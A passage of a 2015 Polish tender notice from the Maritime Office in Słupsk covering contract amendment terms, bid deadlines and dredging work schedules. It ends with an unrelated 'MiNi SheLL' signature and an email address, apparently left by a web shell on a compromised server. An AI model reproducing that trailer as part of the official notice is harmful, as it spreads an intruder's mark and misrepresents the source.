4.	sposobu spełnienia świadczenia stron na skutek wystąpienia konieczności zmian dokumentacji projektowej oraz realizacji robót dodatkowych lub zamiennych, niewykraczających poza zakres przedmiotu zamówienia, podyktowanych m.in. zwiększeniem bezpieczeństwa wykonywanych robót, zapobieżeniem powstania strat dla Zamawiającego, uzyskaniem założonego efektu użytkowego, koniecznością wykonania robót związanych z likwidacją szkód powstałych w wyniku zdarzenia losowego - o ile okoliczności te powodują konieczność zmiany sposobu spełnienia świadczeń stron i zmiany w tym zakresie będą dokonane zgodnie z projektem zamiennym (dokumentacją zamienną);
5.	zapis punktu 21.9.4. SIWZ nie dotyczy wykonania prac przywracających stan poprzedni, w sytuacji kiedy do czasu odbioru końcowego całości robót Wykonawca na zasadzie ryzyka ponosi wyłączną odpowiedzialność za oddanie przedmiotu umowy, zgodnie z projektem i z zasadami wiedzy technicznej. W przypadku uszkodzenia lub zniszczenia wykonanych robót (w tym także robót odebranych w ramach odbiorów częściowych) na  wskutek wystąpienia nieprzewidzianych zjawisk  losowych, w tym siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pokój nr 22, II p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2015 godzina 10:00, miejsce: Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pokój nr 20, II p., sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamawiający ustala następujący termin realizacji robót czerpalno-refutacyjnych:
1.1.	zadanie nr 1: od dnia 01 września 2015 r. do dnia 18 grudnia 2015 r.
1.2.	zadanie nr 2: od dnia 01 września 2015 r. do dnia 18 grudnia 2015 r.
1.3.	zadanie nr 3: od dnia 01 września 2015 r. do dnia 18 grudnia 2015 r.
1.4.	zadanie nr 4: od dnia 01 września 2015 r. do dnia 18 grudnia 2015 r. 
1.5.	zadanie nr 5: od dnia 01 maja 2015 r. do dnia 30 czerwca 2015 r. 
2.	Pobranie i zbadanie próbek urobku, zgodnie z zapisami pkt. 3.3.2.: w terminie 3 miesięcy od dnia podpisania umowy - dla zadań 1-4.   
3.  Pobranie i zbadanie próbek urobku dla zadania nr 5, zgodnie z zapisami pkt. 3.3.2. w terminie 2 miesięcy od dnia podpisania umowy.
4.  W okresie lipiec i sierpień Zamawiający nie przewiduje realizacji robót czerpalnych, jednak w wyjątkowych sytuacjach, które mogą wyniknąć z nagłego pogorszenia głębokości nawigacyjnej, Zamawiający może wezwać Wykonawcę do wykonania robót czerpalnych w portach i na redach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com